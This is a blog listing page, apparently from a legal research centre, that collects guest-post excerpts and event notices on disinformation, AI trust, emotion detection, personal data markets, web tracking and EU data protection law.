British government’s new ‘anti-fake news’ unit has been tried before – and it got out of hand

File 20180125 107940 14x31mj.jpg?ixlib=rb 1.1
 

In this guest post, Dan Lomas, Programme Leader, MA Intelligence and Security Studies, University of Salford, explores the British government’s new ‘anti-fake news’ unit.

The decision to set up a new National Security Communications Unit to counter the growth of “fake news” is not the first time the UK government has devoted resources to exploit the defensive and offensive capabilities of information. A similar thing was tried in the Cold War era, with mixed results.

The planned unit has emerged as part of a wider review of defence capabilities. It will reportedly be dedicated to “combating disinformation by state actors and others” and was agreed at a meeting of the National Security Council (NSC).

As a spokesperson for UK prime minister Theresa May told journalists:

We are living in an era of fake news and competing narratives. The government will respond with more and better use of national security communications to tackle these interconnected, complex challenges.

 

Continue reading

Annual Conference 2017 Resources

The Information Law and Policy Centre held its third annual conference on 17th November 2017. The workshop’s theme was: ‘Children and Digital Rights: Regulating Freedoms and Safeguards’.

The workshop brought together regulators, practitioners, civil society, and leading academic experts who addressed and examined the key legal frameworks and policies being used and developed to safeguard children’s digital freedoms and rights. These legislative and policy regimes include the UN Convention on the Rights of the Child, and the related provisions (such as consent, transparency, and profiling) under the UK Digital Charter, and the Data Protection Bill which will implement the EU General Data Protection Regulation.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)

Co-existing with HAL 9000: Being Human in a World with AI

This event will focus on the implications posed by the increasingly significant role of artificial intelligence (AI) in society and the possible ways in which humans will co-exist with AI in future, particularly the impact that this interaction will have on our liberty, privacy, and agency. Will the benefits of AI only be achieved at the expense of these human rights and values? Do current laws, ethics, or technologies offer any guidance with respect to how we should navigate this future society?

Event date:
Monday, 20 November 2017 – 5:30pm

Emotion detection, personalisation and autonomous decision-making online

This event took place at the Information Law and Policy Centre at the Institute of Advanced Legal Studies on Monday, 5 February 2018.

Date
05 Feb 2018, 17:30 to 05 Feb 2018, 19:30
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Speaker: Damian Clifford, KU Leuven Centre for IT and IP Law

Panel Discussants:

Dr Edina Harbinja, Senior Lecturer in Law, University of Hertfordshire.

Hamed Haddadi, Senior Lecturer (Associate Professor),  Deputy Director of Research in the Dyson School of Design Engineering, and an Academic Fellow of the Data Science Institute in the Faculty of Engineering, Imperial College London.

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law and Policy Centre, Institute of Advanced Legal Studies

Description:

Emotions play a key role in decision making. Technological advancements are now rendering emotions detectable in real-time. Building on the granular insights provided by big data, such technological developments allow commercial entities to move beyond the targeting of behaviour in advertisements to the personalisation of services, interfaces and the other consumer-facing interactions, based on personal preferences, biases and emotion insights gleaned from the tracking of online activity and profiling and the emergence of ‘emphathic media’.

Continue reading

Personal Data as an Asset: Design and Incentive Alignments in a Personal Data Economy

Registration open

Date
19 Feb 2018, 17:30 to 19 Feb 2018, 19:30
Institute
Institute of Advanced Legal Studies
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR


Speaker:  Professor Irene Ng, Director of the International Institute for Product and Service Innovation and the Professor of Marketing and Service Systems at WMG, University of Warwick
Panel Discussants: Perry Keller, King’s College London and John Sheridan, National ArchivesChair:  Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law & Policy Centre, Institute of Advanced Legal Studies

 

Description:

Despite the World Economic Forum (2011) report on personal data becoming an asset class  the cost of transacting on personal data is becoming increasingly high with regulatory risks, societal disapproval, legal complexity and privacy concerns.

Professor Irene Ng contends that this is because personal data as an asset is currently controlled by organisations. As a co-produced asset, the person has not had the technological capability to control and process his or her own data or indeed, data in general. Hence, legal and economic structures have been created only around Organisation-controlled personal data (OPD).

This presentation will argue that a person-controlled personal data (PPD), technologically, legally and economically architected such that the individual owns a personal micro-server and therefore have full rights to the data within, much like owning a PC or a smartphone, is potentially a route to reducing transaction costs and innovating in the personal data economy. I will present the design and incentive alignments of stakeholders on the HAT hub-of-all-things platform (https://hubofallthings.com).

Professor Irene Ng is the Director of the International Institute for Product and Service Innovation and the Professor of Marketing and Service Systems at WMG, University of Warwick. She is also the Chairman of the Hub-of-all-Things (HAT) Foundation Group (http://hubofallthings.com). A market design economist, Professor Ng is an advisor to large organisations, startups and governments on design of markets, economic and business models in the digital economy. Personal website http://ireneng.com

John Sheridan is the Digital Director at The National Archives, with overall responsibility for the organisation’s digital services and digital archiving capability. His role is to provide strategic direction, developing the people and capability needed for The National Archives to become a disruptive digital archive. John’s academic background is in mathematics and information technology, with a degree in Mathematics and Computer Science from the University of Southampton and a Master’s Degree in Information Technology from the University of Liverpool. Prior to his current role, John was the Head of Legislation Services at The National Archives where he led the team responsible for creating legislation.gov.uk, as well overseeing the operation of the official Gazette. John recently led, as Principal Investigator, an Arts and Humanities Research Council funded project, ‘big data for law’, exploring the application of data analytics to the statute book, winning the Halsbury Legal Award for Innovation. John has a strong interest in the web and data standards and is a former co-chair of the W3C e-Government Interest Group. He serves on the UK Government’s Data Leaders group and Open Standards Board which sets data standards for use across government. John was an early pioneer of open data and remains active in that community.

Perry Keller is Reader in Media and Information Law at the Dickson Poon School of Law, King’s College London, where he teaches and researches issues relating to freedom of expression, privacy and data protection. He is the author of European and International Media Law. Mr Keller’s current research concerns the transparency of urban life as a consequence of governmental and commercial surveillance and the particular challenges that brings for liberal democracies. He also has longstanding connections with China, having previously studied or worked in Beijing, Nanjing, Taipei and Hong Kong. His current research interests regarding law and regulation in China concern the development of a divergent Chinese model for securing data privacy and security.

A wine reception will follow this seminar.


Admission FREE but advance booking is required.

 

AI trust and AI fears: A media debate that could divide society

File 20180109 83547 1gya2pg.jpg?ixlib=rb 1.1

In this guest post, Dr Vyacheslav Polonski, Researcher, University of Oxford examines the key question of trust or fear of AI.

We are at a tipping point of a new digital divide. While some embrace AI, many people will always prefer human experts even when they’re wrong.

Unless you live under a rock, you probably have been inundated with recent news on machine learning and artificial intelligence (AI). With all the recent breakthroughs, it almost seems like AI can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Of course, many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.

Continue reading

A Prediction about Predictions

In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s Blog as part of Laurence Eastham’s Predictions 2018 series. It is also appearing in Computers & Law, December/January issue.

Continue reading

How websites watch your every move and ignore privacy settings

File 20171122 6055 jrvkjw.jpg?ixlib=rb 1.1

In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personal identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.

Continue reading

Who’s responsible for what happens on Facebook? Analysis of a new ECJ opinion

In this guest post Lorna Woods, Professor of Internet Law at the University of Essex, provides an analysis on the new ECJ opinion . This post first appeared on the blog of Steve Peers, Professor of EU, Human Rights and World Trade Law at the University of Essex.

Who is responsible for data protection law compliance on Facebook fan sites? That issue is analysed in a recent opinion of an ECJ Advocate-General, in the case of Wirtschaftsakademie (full title: Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein v Wirtschaftsakademie Schleswig-Holstein GmbH, in the presence of Facebook Ireland Ltd, Vertreter des Bundesinteresses beim Bundesverwaltungsgericht).

This case is one more in a line of cases dealing specifically with the jurisdiction of national data protection supervisory authorities, a line of reasoning which seems to operate separately from the Brussels I Recast Regulation, which concerns jurisdiction of courts over civil and commercial disputes.  While this is an Advocate-General’s opinion, and therefore not binding on the Court, if followed by the Court it would consolidates the Court’s prior broad interpretation of the Data Protection Directive.  While this might be the headline, it is worth considering a perhaps overlooked element of the data-economy: the role of the content provider in providing individuals whose data is harvested.

Continue reading